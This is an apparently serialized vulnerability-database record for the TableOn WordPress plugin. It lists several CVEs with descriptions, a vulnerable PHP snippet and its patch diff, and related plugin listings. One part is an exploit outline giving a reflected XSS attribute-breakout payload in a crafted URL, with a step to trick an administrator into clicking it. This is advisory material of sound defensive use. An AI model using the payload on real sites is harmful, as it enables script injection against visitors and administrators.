value=\"' . $search_val . '\" \u002F>';\n\n---\n\n\u002F\u002F Alternatively reflected in AJAX initialization scripts\n$vars = [\n    'search' => $_GET['tableon_txt_search'],\n    \u002F\u002F ... other vars\n];\necho '\u003Cscript>var tableon_data = ' . json_encode($vars) . ';\u003C\u002Fscript>'; \u002F\u002F Often lacks proper WP JSON encoding if older functions are used","--- a\u002Fclasses\u002Ftableon.php\n+++ b\u002Fclasses\u002Ftableon.php\n@@ -124,1 +124,1 @@\n-    echo '\u003Cinput type=\"text\" class=\"tableon_txt_search\" value=\"' . $search_val . '\" \u002F>';\n+    echo '\u003Cinput type=\"text\" class=\"tableon_txt_search\" value=\"' . esc_attr($search_val) . '\" \u002F>';\n\n@@ -150,1 +150,1 @@\n-    echo '\u003Cscript>var tableon_data = ' . json_encode($vars) . ';\u003C\u002Fscript>';\n+    echo '\u003Cscript>var tableon_data = ' . wp_json_encode($vars) . ';\u003C\u002Fscript>';","1. Identify a public page or post on the target WordPress site that utilizes the [tableon] shortcode.\n2. Identify the parameter used for searching within the table, typically `tableon_txt_search` or `tableon_page`.\n3. Craft a malicious payload designed to break out of an HTML attribute (e.g., `\">\u003Cscript>alert(origin)\u003C\u002Fscript>`).\n4. Construct a URL including the payload: `https:\u002F\u002Fexample.com\u002Ftable-page\u002F?tableon_txt_search=\">\u003Cscript>alert(origin)\u003C\u002Fscript>`.\n5. Trick an authenticated user (such as an administrator) or any visitor into clicking the crafted link.\n6. The browser will render the page, reflecting the script into the DOM and executing the JavaScript in the context of the site.","2026-05-05 05:05:04","2026-05-05 05:05:30",{"id":84,"url_slug":85,"title":86,"description":87,"plugin_slug":4,"theme_slug":39,"affected_versions":88,"patched_in_version":89,"severity":42,"cvss_score":43,"cvss_vector":44,"vuln_type":45,"published_date":90,"updated_date":91,"references":92,"days_to_patch":49,"patch_diff_files":94,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-5143","tableon-wordpress-posts-table-filterable-authenticated-contributor-stored-cross-site-scripting-via-tableonpopupiframebut","TableOn – WordPress Posts Table Filterable \u003C= 1.0.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via tableon_popup_iframe_button Shortcode","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tableon_popup_iframe_button shortcode in all versions up to, and including, 1.0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","\u003C=1.0.4.1","1.0.4.2","2025-06-20 18:15:37","2025-06-21 06:42:50",[93],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F447d3aa6-2ed3-4da3-b9e8-fc7792c8c29a?source=api-prod",[],{"id":96,"url_slug":97,"title":98,"description":99,"plugin_slug":4,"theme_slug":39,"affected_versions":100,"patched_in_version":101,"severity":42,"cvss_score":102,"cvss_vector":103,"vuln_type":104,"published_date":105,"updated_date":106,"references":107,"days_to_patch":109,"patch_diff_files":110,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-60244","tableon-unauthenticated-arbitrary-shortcode-execution","TableOn \u003C= 1.0.5.1 - Unauthenticated Arbitrary Shortcode Execution","The The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0.5.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","\u003C=1.0.5.1","1.0.6",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Control of Generation of Code ('Code Injection')","2025-05-22 00:00:00","2026-05-04 14:38:38",[108],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0a69e4e0-0872-4604-98ae-6a0502e7e965?source=api-prod",348,[],{"id":112,"url_slug":113,"title":114,"description":115,"plugin_slug":4,"theme_slug":39,"affected_versions":116,"patched_in_version":117,"severity":42,"cvss_score":69,"cvss_vector":70,"vuln_type":45,"published_date":118,"updated_date":119,"references":120,"days_to_patch":28,"patch_diff_files":122,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-32592","tableon-wordpress-posts-table-filterable-unauthenticated-stored-cross-site-scripting","TableOn – WordPress Posts Table Filterable \u003C= 1.0.3 - Unauthenticated Stored Cross-Site Scripting","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","\u003C=1.0.3","1.0.4","2025-04-14 00:00:00","2025-04-21 20:37:47",[121],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbc547d3d-9b08-472a-937d-d9c815c33087?source=api-prod",[],{"id":124,"url_slug":125,"title":126,"description":127,"plugin_slug":4,"theme_slug":39,"affected_versions":128,"patched_in_version":129,"severity":130,"cvss_score":131,"cvss_vector":132,"vuln_type":133,"published_date":134,"updated_date":135,"references":136,"days_to_patch":138,"patch_diff_files":139,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-32569","tableon-wordpress-posts-table-filterable-unauthenticated-php-object-injection","TableOn – WordPress Posts Table Filterable \u003C= 1.0.4.3 - Unauthenticated PHP Object Injection","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.0.4.3 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","\u003C=1.0.4.3","1.0.4.4","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2025-04-10 00:00:00","2026-01-27 20:54:32",[137],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3a03b32f-a5a4-4c1b-ad93-0833af6c302e?source=api-prod",293,[],{"id":141,"url_slug":142,"title":143,"description":144,"plugin_slug":4,"theme_slug":39,"affected_versions":100,"patched_in_version":101,"severity":42,"cvss_score":145,"cvss_vector":146,"vuln_type":147,"published_date":148,"updated_date":149,"references":150,"days_to_patch":152,"patch_diff_files":153,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-32218","tableon-wordpress-posts-table-filterable-missing-authorization","TableOn – WordPress Posts Table Filterable \u003C= 1.0.5.1 - Missing Authorization","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2025-04-04 00:00:00","2026-05-05 18:33:55",[151],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Febe59b29-f8d4-4ea0-b4a8-d758ddb1c594?source=api-prod",397,[],{"id":155,"url_slug":156,"title":157,"description":158,"plugin_slug":4,"theme_slug":39,"affected_versions":159,"patched_in_version":160,"severity":42,"cvss_score":69,"cvss_vector":70,"vuln_type":45,"published_date":161,"updated_date":162,"references":163,"days_to_patch":165,"patch_diff_files":166,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"WF-d60f69f1-eaea-49cb-bbe3-281ec4f872f1-posts-table-filterable","tableon-wordpress-posts-table-filterable-reflected-cross-site-scripting","TableOn – WordPress Posts Table Filterable  \u003C= 1.0.0 - Reflected Cross-Site Scripting","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tableon-remote-page’ parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C1.0.1","1.0.1","2021-10-18 00:00:00","2024-01-22 19:56:02",[164],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd60f69f1-eaea-49cb-bbe3-281ec4f872f1?source=api-prod",827,[],{"slug":168,"display_name":7,"profile_url":8,"plugin_count":169,"total_installs":170,"avg_security_score":171,"avg_patch_time_days":172,"trust_score":173,"computed_at":174},"realmag777",12,188290,88,196,71,"2026-05-19T21:21:09.495Z",[176,196,218,242,262],{"slug":177,"name":178,"version":160,"author":179,"author_profile":180,"description":181,"short_description":182,"active_installs":183,"downloaded":184,"rating":29,"num_ratings":29,"last_updated":185,"tested_up_to":186,"requires_at_least":187,"requires_php":188,"tags":189,"homepage":192,"download_link":193,"security_score":194,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":195},"wp-posts-table","WP Posts Table","PressCargo","https:\u002F\u002Fprofiles.wordpress.org\u002Fpresscargo\u002F","\u003Cp>WP Posts Table is an easy-to-use plugin for displaying your posts in a table format. Using a simple shortcode, you can create a table of your posts that displays the title, categories, author, and date. The table is searchable and sortable. Users can also pick which column to collapse when viewing on a smaller screen.\u003C\u002Fp>\n\u003Cp>WP Posts Table is fast and flexible. Once loaded, the table is lightning fast and pagination is almost instant. The search function with highlighting also provides a fun and useful feedback interface for your website visitors.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Displays up to 100 posts\u003C\u002Fli>\n\u003Cli>Quick search with highlighting\u003C\u002Fli>\n\u003Cli>Sortable columns. Also supports multi-sort, just hold shift when sorting!\u003C\u002Fli>\n\u003Cli>Collapsible columns to accommodate smaller screens\u003C\u002Fli>\n\u003Cli>Choose different themes to style your table\u003C\u002Fli>\n\u003C\u002Ful>\n","Display your posts in a table format that is searchable and sortable.",20,1918,"2020-06-11T17:14:00.000Z","5.4.19","4.8","5.6.0",[20,22,190,23,191],"sorting","wordpress-table","https:\u002F\u002Fpresscargo.io\u002Fplugins\u002Fwp-posts-table","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-posts-table.1.0.1.zip",85,"2026-03-15T15:16:48.613Z",{"slug":197,"name":198,"version":199,"author":7,"author_profile":8,"description":200,"short_description":201,"active_installs":202,"downloaded":203,"rating":204,"num_ratings":205,"last_updated":206,"tested_up_to":207,"requires_at_least":17,"requires_php":18,"tags":208,"homepage":213,"download_link":214,"security_score":215,"vuln_count":216,"unpatched_count":29,"last_vuln_date":217,"fetched_at":31},"profit-products-tables-for-woocommerce","Active Products Tables for WooCommerce. Use constructor to create tables ","1.0.8","\u003Cp>\u003Cstrong>Active Products Tables for WooCommerce\u003C\u002Fstrong> (second name is WOOT) – is WordPress plugin for WooCommerce products, created for displaying woo shop products in the table format. Woo Products tables makes focus for your buyers on the things they want to get, nothing superfluous, just what the client wants, and full attention to what is offered! Ideal way to higher sells on your woocommerce store!\u003C\u002Fp>\n\u003Cp>🐘 Latest PHP 8.x – FULL COMPATIBILITY! Compatibility: from v.3.6 to the latest woocommerce version.\u003C\u002Fp>\n\u003Cp>🌐 Demo site: \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002F\" rel=\"nofollow ugc\">demo.products-tables.com\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>📄 If you need plugin for pages, posts and their custom post types use: \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fposts-table-filterable\u002F\" rel=\"ugc\">TableOn\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>Active Products Tables Features:\u003C\u002Fh3>\n\u003Cp>🛠️ Columns constructor\u003C\u002Fp>\n\u003Cp>🖼️ Neat shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot\u002F\" rel=\"nofollow ugc\">[woot]\u003C\u002Fa> with heap of attributes for flexibility\u003C\u002Fp>\n\u003Cp>🎩 \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fdocument\u002Fafter-woot-installation-you-can-do-next\u002F\" rel=\"nofollow ugc\">Many possible tricks\u003C\u002Fa> with the products tables!\u003C\u002Fp>\n\u003Cp>📋 \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002Fwoot-with-all-possible-columns\u002F\" rel=\"nofollow ugc\">More than 40 predefined column fields\u003C\u002Fa> is possible to display\u003C\u002Fp>\n\u003Cp>✏️ \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fhow-to-add-custom-column-to-the-tables\u002F\" rel=\"nofollow ugc\">Possibility to create custom columns\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🎨 Skins for each table. On the same web page can be represented \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002Fdifferent-skins\u002F\" rel=\"nofollow ugc\">some products tables with the different skins\u003C\u002Fa>. Create \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fdocument\u002Fskins\u002F\" rel=\"nofollow ugc\">your own skins by CSS\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>🔍 Powerful product filter constructor\u003C\u002Fp>\n\u003Cp>🎛️ \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002Fwoot-with-all-possible-filters\u002F\" rel=\"nofollow ugc\">Big variety of filter elements\u003C\u002Fa> by: price, title, content, excerpt, SKU, attributes, taxonomy, meta fields, in stock, on sale, width, height, length, weight, etc…\u003C\u002Fp>\n\u003Cp>🧩 Filters can be represented as: dropdown, multi drop-down, range sliders, textinput, calendars, switcher\u003C\u002Fp>\n\u003Cp>🎯 Predefinition mechanism: show to your customers predefined and relevant set of products as in the table, so in the popup.\u003C\u002Fp>\n\u003Cp>🔢 25 ways of the products sorting\u003C\u002Fp>\n\u003Cp>🌍 Power feature as \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Finbuilt\" rel=\"nofollow ugc\">remote tables\u003C\u002Fa> which gives ability to spread your shop products to any another sites even created on pure HTML without any CMS, what allows you get more sells and also realize your own referral program\u003C\u002Fp>\n\u003Cp>🖼️ Column “Gallery” – smooth CSS gallery to showcase the best of your products. Also a product gallery can be represented by shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_gallery\u002F\" rel=\"nofollow ugc\">[woot gallery]\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🛒 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_cart\u002F\" rel=\"nofollow ugc\">[woot_cart]\u003C\u002Fa> allows to create custom cart page\u003C\u002Fp>\n\u003Cp>⭐ Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_reviews\u002F\" rel=\"nofollow ugc\">[woot_reviews]\u003C\u002Fa> allows to show the table with reviews for the current product on its single page or any another one\u003C\u002Fp>\n\u003Cp>🔗 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_cross_sells\u002F\" rel=\"nofollow ugc\">[woot_cross_sells]\u003C\u002Fa> allows to show the table with cross sell products for the current product on its single page or any another one\u003C\u002Fp>\n\u003Cp>🔼 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_upsells\u002F\" rel=\"nofollow ugc\">[woot_upsells]\u003C\u002Fa> allows to show the table with upsell products for the current product on its single page or any another one\u003C\u002Fp>\n\u003Cp>🔄 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_variations\u002F\" rel=\"nofollow ugc\">[woot_variations]\u003C\u002Fa> allows to show the table with variations products for the current product on its single page or any another one\u003C\u002Fp>\n\u003Cp>🔗 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_related\u002F\" rel=\"nofollow ugc\">[woot_related]\u003C\u002Fa> allows to show the table with related products for the current product on its single page or any another one\u003C\u002Fp>\n\u003Cp>❤️ Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_favourites\u002F\" rel=\"nofollow ugc\">[woot_favourites]\u003C\u002Fa> allows to show the table with selected products by the current user\u003C\u002Fp>\n\u003Cp>📦 Shortcode \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_single\u002F\" rel=\"nofollow ugc\">[woot_single]\u003C\u002Fa> allows to show the table with a product parameters for any one selected ones\u003C\u002Fp>\n\u003Cp>🏷️ Ability to show multi vendors their products using attribute param author: \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot\u002F\" rel=\"nofollow ugc\">[woot author=23]\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>💬 Ability to create custom columns, for example such as \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fshortcode\u002Fwoot_popup_iframe_button\u002F\" rel=\"nofollow ugc\">“Ask manager about the product”\u003C\u002Fa> using any contact form plugins\u003C\u002Fp>\n\u003Cp>📱 Responsivity: all the products tables have an option for compact view on mobile devices!\u003C\u002Fp>\n\u003Cp>⚙️ Big and flexible set of options for each product table, some of them: Hide added in cart products, Show cart, Show Sorting Dropdown, Sorting Dropdown Fields, Compact view width, Use load more button, Hide filter form, Show print button, Default order by, Per page drop-down position, Per page drop-down position, Per page values, Per page default\u003C\u002Fp>\n\u003Cp>🏷️ Set of options for each product column, some basic: Width, Font size, Font family, Color, Background, Hide on small screen\u003C\u002Fp>\n\u003Cp>🗃️ Ability to add meta fields data in the table columns using in-built constructor\u003C\u002Fp>\n\u003Cp>🖼️ Ability to \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002Ftable-as-link\u002F\" rel=\"nofollow ugc\">show a product table in the popup on click\u003C\u002Fa>. Show tables in popup in your shop text content with relevant predefined tables. Unlimited count of tables in popup per page can be created!\u003C\u002Fp>\n\u003Cp>🛒 In-built shopping cart on top of the tables, which also presented as shortcode and can be pasted on the site pages\u003C\u002Fp>\n\u003Cp>🔄 \u003Ca href=\"https:\u002F\u002Fdemo.products-tables.com\u002Fcached-table-of-products\u002F\" rel=\"nofollow ugc\">Caching table of products\u003C\u002Fa> mechanism\u003C\u002Fp>\n\u003Cp>🖨️ Print button\u003C\u002Fp>\n\u003Cp>🛒 Possibility to add to cart many products in one click\u003C\u002Fp>\n\u003Cp>📱 Mobile compact view option\u003C\u002Fp>\n\u003Cp>🎨 CSS editor\u003C\u002Fp>\n\u003Cp>📑 Pagination\u003C\u002Fp>\n\u003Cp>🔄 \u003Ca href=\"https:\u002F\u002Fdemo.products-filter.com\u002Fdemonstration-of-woot-and-woof-compatibility\" rel=\"nofollow ugc\">Compatible with WOOF\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🔄 \u003Ca href=\"https:\u002F\u002Fwoocommerce.wp-filter.com\u002Fdemonstration-of-woot-and-mdtf-compatibility\u002F\" rel=\"nofollow ugc\">Compatible with MDTF\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🔄 \u003Ca href=\"https:\u002F\u002Fdemo.currency-switcher.com\u002Fdemonstration-of-woot-and-woocs-compatibility\u002F\" rel=\"nofollow ugc\">Compatible with WOOCS\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🔄 \u003Ca href=\"https:\u002F\u002Fbulk-editor.com\u002F\" rel=\"nofollow ugc\">Compatible with BEAR\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🔄 Compatible with \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcustom-post-type-ui\u002F\" rel=\"ugc\">Custom Post Type UI\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🌐 WPML compatible\u003C\u002Fp>\n\u003Cp>🧩 Shortcodes works in Elementor and Page builder page content\u003C\u002Fp>\n\u003Cp>🚀 \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fcodex\u002F\" rel=\"nofollow ugc\">Power and strong API\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>⚛️ no jQuery – 100% pure JavaScript\u003C\u002Fp>\n\u003Cp>🛠️ \u003Ca href=\"https:\u002F\u002Fpluginus.net\u002Fsupport\u002Fforum\u002Fwoot-woocommerce-active-products-tables\u002F\" rel=\"nofollow ugc\">Strong technical support which each day works with tones of code!\u003C\u002Fa>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fwoot-documentation\u002F\" rel=\"nofollow ugc\">📚 Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fcodecanyon.pluginus.net\u002Fitem\u002Fwoot-woocommerce-products-tables\u002F27928580\" rel=\"nofollow ugc\">💎 The Premium version\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F4f1wyApG68Y?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch3>Premium version:\u003C\u002Fh3>\n\u003Cp>🌟 In the premium version \u003Ca href=\"https:\u002F\u002Fproducts-tables.com\u002Fdownloads\" rel=\"nofollow ugc\">all features and extensions included\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>🌟 You can get premium version of the plugin on the \u003Ca href=\"https:\u002F\u002Fcodecanyon.pluginus.net\u002Fitem\u002Fwoot-woocommerce-products-tables\u002F27928580\" rel=\"nofollow ugc\">CodeCanyon\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Make your site more profitable with next powerful scripts:\u003C\u002Fh3>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoocommerce-products-filter\u002F\" rel=\"ugc\">WOOF – Products Filter for WooCommerce\u003C\u002Fa>: products filter plugin for WooCommerce that allows your customers filter products by categories, attributes, products tags, products custom taxonomies and price – a must have plugin for your WooCommerce online store!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fbulk-editor.com\u002F\" rel=\"nofollow ugc\">BEAR – WooCommerce Bulk Editor and Products Manager Professional\u003C\u002Fa>: WordPress plugin for managing and bulk edit WooCommerce Products data in the reliable and flexible way! Be professionals with managing data of your e-shop!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwoocommerce-currency-switcher\u002F\" rel=\"ugc\">WOOCS – Currency Switcher for WooCommerce\u003C\u002Fa>: is WooCommerce multi currency plugin, that allows your site visitors switch products prices currencies according to set currencies rates in the real time and pay in the selected currency (optionally). Allows to add any currency for WooCommerce store!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fposts-table-filterable\" rel=\"ugc\">TABLEON – WordPress Post Tables Filterable\u003C\u002Fa>: WordPress plugin for displaying site posts and their custom post types in table format. Tables makes focus for your customers on the things they want to get, nothing superfluous, just what the client wants, and full attention to what is offered!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcurrency-switcher\u002F\" rel=\"ugc\">WPCS – WordPress Currency Switcher\u003C\u002Fa>: is a WordPress plugin that allows to switch currencies and get their rates converted in the real time on your site!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fbulk-editor\u002F\" rel=\"ugc\">WOLF – WordPress Posts Bulk Editor and Manager Professional\u003C\u002Fa>: is WordPress plugin for managing and bulk edit WordPress posts, pages and custom post types data in robust and flexible way! Be professionals with managing data of your site!\u003C\u002Fp>\n\u003Cp>✅ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Ftaxonomy-chain-menu\u002F\" rel=\"ugc\">Taxonomy Chain Menu\u003C\u002Fa>: is WordPress plugin with one shortcode, which allows to create taxonomies terms chain menus using dropdowns with inbuilt or custom types of WordPress taxonomies.\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is copyright pluginus.net © 2012-2026 with \u003Ca href=\"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FGNU_General_Public_License\" rel=\"nofollow ugc\">GPLv2\u003C\u002Fa> by realmag777.\u003C\u002Fp>\n\u003Cp>This program is free software; you can redistribute it and\u002For modify it under the terms of the \u003Ca href=\"http:\u002F\u002Fwww.gnu.org\u002Fcopyleft\u002Fgpl.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.\u003C\u002Fp>\n\u003Cp>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY. See the GNU General Public License for more details.\u003C\u002Fp>\n","WooCommerce Active Products Tables - is the WooCommerce Products Table plugin displaying shop products in table format",1000,73553,96,18,"2026-03-02T15:22:00.000Z","6.9.4",[209,210,211,23,212],"product-table","products-filter","products-table","woocommerce-product-table","https:\u002F\u002Fproducts-tables.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofit-products-tables-for-woocommerce.zip",83,13,"2026-03-10 00:00:00",{"slug":219,"name":220,"version":221,"author":222,"author_profile":223,"description":224,"short_description":225,"active_installs":226,"downloaded":227,"rating":228,"num_ratings":229,"last_updated":230,"tested_up_to":231,"requires_at_least":232,"requires_php":233,"tags":234,"homepage":240,"download_link":241,"security_score":194,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"responsive-menu-card-price-list-items","Responsive Menu Card | Price List Items","1.6","mgulzar","https:\u002F\u002Fprofiles.wordpress.org\u002Fmgulzar\u002F","\u003Cp>A customisable and responsive menu card for your site.\u003C\u002Fp>\n\u003Ch3>Display:\u003C\u002Fh3>\n\u003Cp>Same like post\u002Fpages section of your site, it creates another custom post type name Menu Card.\u003C\u002Fp>\n\u003Cp>Under this section you can create your menu items, with Item title, Item content, price as a custom field, Item image as a feature image and desired categories for your item. Categories here work same like post categories, just create your desired categories and then assign them to different menu items.\u003Cbr \u002F>\nAfter you setup your menu items with price and categories, now its time to display them on the site. To display the menu card on front end just use this shortcode (menu-card) in your post, 